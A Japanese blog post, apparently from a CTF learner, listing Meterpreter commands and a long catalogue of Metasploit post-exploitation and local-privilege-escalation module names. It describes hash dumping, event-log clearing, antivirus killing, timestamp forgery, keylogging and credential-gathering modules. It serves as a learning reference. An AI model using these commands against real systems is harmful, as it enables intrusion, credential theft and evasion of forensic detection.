Capture The Frog

かえるぴょこぴょこw

MENU

meterpreterの使えるコマンド一覧

meterpreterの使えるコマンドということで、まとめていく

随時更新していく予定。

 

・sysinfo

システム情報取得

 

・ipconfig

使い方は、dosコマンドと一緒

 

・ps

プロセス一覧取得

 

・getuid

ユーザーの確認

 

・getsystem

権限昇格を試みる

オプションなしでは複数の方法を試行する

 

・getuid

ユーザーの確認

 

・getprivs

有効な特権の確認

 

・hashdup

パスワードハッシュの取得

取得できたハッシュは、johnで解析

 

・upload ファイル名

ファイルを攻撃対象にアップロード

 

・download ファイル名

攻撃対象のファイルを自ホストにダウンロード

 

・timestomp ファイル名 -z "01/01/2005 00:00:00"

ファイルのタイムスタンプ変更

 

・screenshot

スクリーンショット

Metasploitを実行しているマシンのブラウザでjpegファイルが表示される

 

・ clearev

イベントログの削除

 

・excute ファイル名

実行ファイルを実行できる。

 

・run

runと入力して、tabキーを3回押すと実行可能なmeterpreterスクリプトの一覧が表示される。

 

・run checkvm

仮想環境かチェック

 

・run killav

アンチウイルスを終了する

 

・run getgui -e

リモートデスクトップを有効にする

 

・run keylogrecorder

キーロガーの実行

 

・run packetrecoder

パケットキャプチャーの実行

 

runのスクリプト一覧

スクリプト名読めば大体理解できるから大丈夫ってことにしとく


run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager

run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run winbf
run winenum
run wmic

 



run exploit/windows/local/adobe_sandbox_adobecollabsync

run exploit/windows/local/agnitum_outpost_acs
run exploit/windows/local/alpc_taskscheduler
run exploit/windows/local/always_install_elevated
run exploit/windows/local/anyconnect_lpe
run exploit/windows/local/applocker_bypass
run exploit/windows/local/appxsvc_hard_link_privesc
run exploit/windows/local/ask
run exploit/windows/local/bits_ntlm_token_impersonation
run exploit/windows/local/bthpan
run exploit/windows/local/bypassuac
run exploit/windows/local/bypassuac_comhijack
run exploit/windows/local/bypassuac_dotnet_profiler
run exploit/windows/local/bypassuac_eventvwr
run exploit/windows/local/bypassuac_fodhelper
run exploit/windows/local/bypassuac_injection
run exploit/windows/local/bypassuac_injection_winsxs
run exploit/windows/local/bypassuac_sdclt
run exploit/windows/local/bypassuac_silentcleanup

run exploit/windows/local/bypassuac_sluihijack
run exploit/windows/local/bypassuac_vbs
run exploit/windows/local/bypassuac_windows_store_filesys
run exploit/windows/local/bypassuac_windows_store_reg
run exploit/windows/local/capcom_sys_exec
run exploit/windows/local/comahawk
run exploit/windows/local/current_user_psexec
run exploit/windows/local/cve_2017_8464_lnk_lpe
run exploit/windows/local/cve_2018_8453_win32k_priv_esc
run exploit/windows/local/cve_2019_1458_wizardopium
run exploit/windows/local/cve_2020_0668_service_tracing
run exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
run exploit/windows/local/cve_2020_0796_smbghost
run exploit/windows/local/cve_2020_1048_printerdemon
run exploit/windows/local/cve_2020_1054_drawiconex_lpe
run exploit/windows/local/cve_2020_1313_system_orchestrator
run exploit/windows/local/cve_2020_1337_printerdemon
run exploit/windows/local/cve_2020_17136
run exploit/windows/local/cve_2021_1732_win32k
run exploit/windows/local/cve_2021_21551_dbutil_memmove
run exploit/windows/local/dnsadmin_serverlevelplugindll
run exploit/windows/local/docker_credential_wincred
run exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
run exploit/windows/local/gog_galaxyclientservice_privesc
run exploit/windows/local/ikeext_service
run exploit/windows/local/ipass_launch_app
run exploit/windows/local/lenovo_systemupdate
run exploit/windows/local/microfocus_operations_privesc
run exploit/windows/local/mov_ss
run exploit/windows/local/mqac_write
run exploit/windows/local/ms10_015_kitrap0d
run exploit/windows/local/ms10_092_schelevator
run exploit/windows/local/ms11_080_afdjoinleaf
run exploit/windows/local/ms13_005_hwnd_broadcast
run exploit/windows/local/ms13_053_schlamperei

run exploit/windows/local/ms13_081_track_popup_menu
run exploit/windows/local/ms13_097_ie_registry_symlink
run exploit/windows/local/ms14_009_ie_dfsvc
run exploit/windows/local/ms14_058_track_popup_menu
run exploit/windows/local/ms14_070_tcpip_ioctl
run exploit/windows/local/ms15_004_tswbproxy
run exploit/windows/local/ms15_051_client_copy_image
run exploit/windows/local/ms15_078_atmfd_bof
run exploit/windows/local/ms16_014_wmi_recv_notif
run exploit/windows/local/ms16_016_webdav
run exploit/windows/local/ms16_032_secondary_logon_handle_privesc
run exploit/windows/local/ms16_075_reflection
run exploit/windows/local/ms16_075_reflection_juicy
run exploit/windows/local/ms18_8120_win32k_privesc
run exploit/windows/local/ms_ndproxy
run exploit/windows/local/novell_client_nicm
run exploit/windows/local/novell_client_nwfs
run exploit/windows/local/nscp_pe
run exploit/windows/local/ntapphelpcachecontrol
run exploit/windows/local/ntusermndragover
run exploit/windows/local/nvidia_nvsvc
run exploit/windows/local/panda_psevents
run exploit/windows/local/payload_inject
run exploit/windows/local/persistence
run exploit/windows/local/persistence_image_exec_options
run exploit/windows/local/persistence_service
run exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
run exploit/windows/local/powershell_cmd_upgrade
run exploit/windows/local/powershell_remoting
run exploit/windows/local/ppr_flatten_rec
run exploit/windows/local/ps_persist
run exploit/windows/local/ps_wmi_exec
run exploit/windows/local/pxeexploit
run exploit/windows/local/razer_zwopenprocess
run exploit/windows/local/registry_persistence
run exploit/windows/local/ricoh_driver_privesc
run exploit/windows/local/run_as
run exploit/windows/local/s4u_persistence
run exploit/windows/local/service_permissions
run exploit/windows/local/srclient_dll_hijacking
run exploit/windows/local/tokenmagic
run exploit/windows/local/unquoted_service_path
run exploit/windows/local/virtual_box_guest_additions
run exploit/windows/local/virtual_box_opengl_escape
run exploit/windows/local/vss_persistence
run exploit/windows/local/webexec
run exploit/windows/local/windscribe_windscribeservice_priv_esc
run exploit/windows/local/wmi
run exploit/windows/local/wmi_persistence
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets

run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/aix/hashdump
run post/android/capture/screen
run post/android/gather/hashdump
run post/android/gather/sub_info
run post/android/gather/wireless_ap
run post/android/local/koffee
run post/android/manage/remove_lock
run post/android/manage/remove_lock_root
run post/apple_ios/gather/ios_image_gather
run post/apple_ios/gather/ios_text_gather
run post/bsd/gather/hashdump
run post/firefox/gather/cookies
run post/firefox/gather/history
run post/firefox/gather/passwords
run post/firefox/gather/xss
run post/firefox/manage/webcam_chat
run post/hardware/automotive/can_flood
run post/hardware/automotive/canprobe
run post/hardware/automotive/getvinfo
run post/hardware/automotive/identifymodules
run post/hardware/automotive/malibu_overheat
run post/hardware/automotive/mazda_ic_mover
run post/hardware/automotive/pdt
run post/hardware/rftransceiver/rfpwnon
run post/hardware/rftransceiver/transmitter
run post/hardware/zigbee/zstumbler
run post/linux/busybox/enum_connections
run post/linux/busybox/enum_hosts
run post/linux/busybox/jailbreak
run post/linux/busybox/ping_net
run post/linux/busybox/set_dmz
run post/linux/busybox/set_dns
run post/linux/busybox/smb_share_root

run post/linux/busybox/wget_exec
run post/linux/dos/xen_420_dos
run post/linux/gather/checkcontainer
run post/linux/gather/checkvm
run post/linux/gather/ecryptfs_creds
run post/linux/gather/enum_commands
run post/linux/gather/enum_configs
run post/linux/gather/enum_containers
run post/linux/gather/enum_nagios_xi
run post/linux/gather/enum_network
run post/linux/gather/enum_protections
run post/linux/gather/enum_psk
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/gnome_commander_creds
run post/linux/gather/gnome_keyring_dump
run post/linux/gather/haserl_read
run post/linux/gather/hashdump
run post/linux/gather/mount_cifs_creds
run post/linux/gather/openvpn_credentials
run post/linux/gather/phpmyadmin_credsteal
run post/linux/gather/pptpd_chap_secrets
run post/linux/gather/tor_hiddenservices
run post/linux/manage/dns_spoofing
run post/linux/manage/download_exec
run post/linux/manage/iptables_removal
run post/linux/manage/pseudo_shell
run post/linux/manage/sshkey_persistence
run post/multi/escalate/aws_create_iam_user
run post/multi/escalate/cups_root_file_read
run post/multi/escalate/metasploit_pcaplog
run post/multi/gather/apple_ios_backup
run post/multi/gather/aws_ec2_instance_metadata
run post/multi/gather/aws_keys
run post/multi/gather/check_malware
run post/multi/gather/chrome_cookies
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/docker_creds
run post/multi/gather/enum_hexchat
run post/multi/gather/enum_software_versions
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/fetchmailrc_creds
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/gpg_creds
run post/multi/gather/grub_creds
run post/multi/gather/irssi_creds
run post/multi/gather/jboss_gather
run post/multi/gather/jenkins_gather

run post/multi/gather/lastpass_creds
run post/multi/gather/maven_creds
run post/multi/gather/multi_command
run post/multi/gather/netrc_creds
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/remmina_creds
run post/multi/gather/resolve_hosts
run post/multi/gather/rsyncd_creds
run post/multi/gather/rubygems_api_key
run post/multi/gather/run_console_rc_file
run post/multi/gather/saltstack_salt
run post/multi/gather/skype_enum
run post/multi/gather/ssh_creds
run post/multi/gather/thunderbird_creds
run post/multi/gather/tomcat_gather
run post/multi/gather/ubiquiti_unifi_backup
run post/multi/gather/unix_cached_ad_hashes
run post/multi/gather/unix_kerberos_tickets
run post/multi/gather/wlan_geolocate
run post/multi/general/close
run post/multi/general/execute
run post/multi/general/wall
run post/multi/manage/autoroute
run post/multi/manage/dbvis_add_db_admin
run post/multi/manage/dbvis_query
run post/multi/manage/hsts_eraser
run post/multi/manage/multi_post
run post/multi/manage/open
run post/multi/manage/play_youtube
run post/multi/manage/record_mic
run post/multi/manage/screensaver
run post/multi/manage/screenshare
run post/multi/manage/set_wallpaper
run post/multi/manage/shell_to_meterpreter
run post/multi/manage/sudo
run post/multi/manage/system_session
run post/multi/manage/upload_exec
run post/multi/manage/zip
run post/multi/recon/local_exploit_suggester
run post/multi/recon/multiport_egress_traffic
run post/multi/recon/sudo_commands
run post/multi/sap/smdagent_get_properties

run exploit/multi/local/allwinner_backdoor
run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
run exploit/multi/local/xorg_x11_suid_server
run exploit/multi/local/xorg_x11_suid_server_modulepath

 


run post/networking/gather/enum_brocade
run post/networking/gather/enum_cisco
run post/networking/gather/enum_f5
run post/networking/gather/enum_juniper
run post/networking/gather/enum_mikrotik
run post/networking/gather/enum_vyos

 

 

run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/golden_ticket
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/screen_unlock
run post/windows/escalate/unmarshal_cmd_exec
run post/windows/gather/ad_to_sqlite
run post/windows/gather/arp_scanner
run post/windows/gather/avast_memory_dump
run post/windows/gather/bitcoin_jacker
run post/windows/gather/bitlocker_fvek
run post/windows/gather/bloodhound
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/avira_password
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump
run post/windows/gather/credentials/dynazip_log
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_laps
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/heidisql
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/mcafee_vse_hashdump
run post/windows/gather/credentials/mdaemon_cred_collector
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/mssql_local_hashdump
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/pulse_secure
run post/windows/gather/credentials/purevpn_cred_collector
run post/windows/gather/credentials/razer_synapse
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/rdc_manager_creds
run post/windows/gather/credentials/securecrt
run post/windows/gather/credentials/skype
run post/windows/gather/credentials/smartermail
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/spark_im
run post/windows/gather/credentials/sso

run post/windows/gather/credentials/steam
run post/windows/gather/credentials/teamviewer_passwords
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/credentials/xshell_xftp_password
run post/windows/gather/dnscache_dump
run post/windows/gather/dumplinks
run post/windows/gather/enum_ad_bitlocker
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/enum_ad_to_wordlist
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_av_excluded
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
run post/windows/gather/enum_emet
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_hyperv_vms
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_muicache
run post/windows/gather/enum_onedrive
run post/windows/gather/enum_patches
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_prefetch
run post/windows/gather/enum_proxy
run post/windows/gather/enum_putty_saved_sessions
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_trusted_locations

 run post/windows/gather/enum_unattend
run post/windows/gather/exchange
run post/windows/gather/file_from_raw_ntfs
run post/windows/gather/forensics/browser_history
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/fanny_bmp_check
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/recovery_files
run post/windows/gather/hashdump
run post/windows/gather/local_admin_search_enum
run post/windows/gather/lsa_secrets
run post/windows/gather/make_csv_orgchart
run post/windows/gather/memory_dump
run post/windows/gather/memory_grep
run post/windows/gather/netlm_downgrade
run post/windows/gather/ntds_grabber
run post/windows/gather/ntds_location
run post/windows/gather/outlook
run post/windows/gather/phish_windows_credentials
run post/windows/gather/psreadline_history
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/gather/word_unc_injector
run post/windows/manage/add_user
run post/windows/manage/archmigrate
run post/windows/manage/change_password
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/driver_loader
run post/windows/manage/enable_rdp
run post/windows/manage/enable_support_account
run post/windows/manage/exec_powershell
run post/windows/manage/execute_dotnet_assembly
run post/windows/manage/forward_pageant
run post/windows/manage/hashcarve
run post/windows/manage/ie_proxypac
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/install_python
run post/windows/manage/install_ssh
run post/windows/manage/killav
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server

 run post/windows/manage/peinjector
run post/windows/manage/persistence_exe
run post/windows/manage/portproxy
run post/windows/manage/powershell/build_net_code
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/powershell/load_script
run post/windows/manage/pptp_tunnel
run post/windows/manage/priv_migrate
run post/windows/manage/pxeexploit
run post/windows/manage/reflective_dll_inject
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rid_hijack
run post/windows/manage/rollback_defender_signatures
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/run_as_psh
run post/windows/manage/sdel
run post/windows/manage/shellcode_inject
run post/windows/manage/sshkey_persistence
run post/windows/manage/sticky_keys
run post/windows/manage/vmdk_mount
run post/windows/manage/vss
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/manage/wdigest_caching
run post/windows/manage/webcam
run post/windows/recon/computer_browser_discovery
run post/windows/recon/outbound_ports
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_probe_request
run post/windows/wlan/wlan_profile

 

 

 

 

 

 

 

詳しくは、ここにチートシートがある。

https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf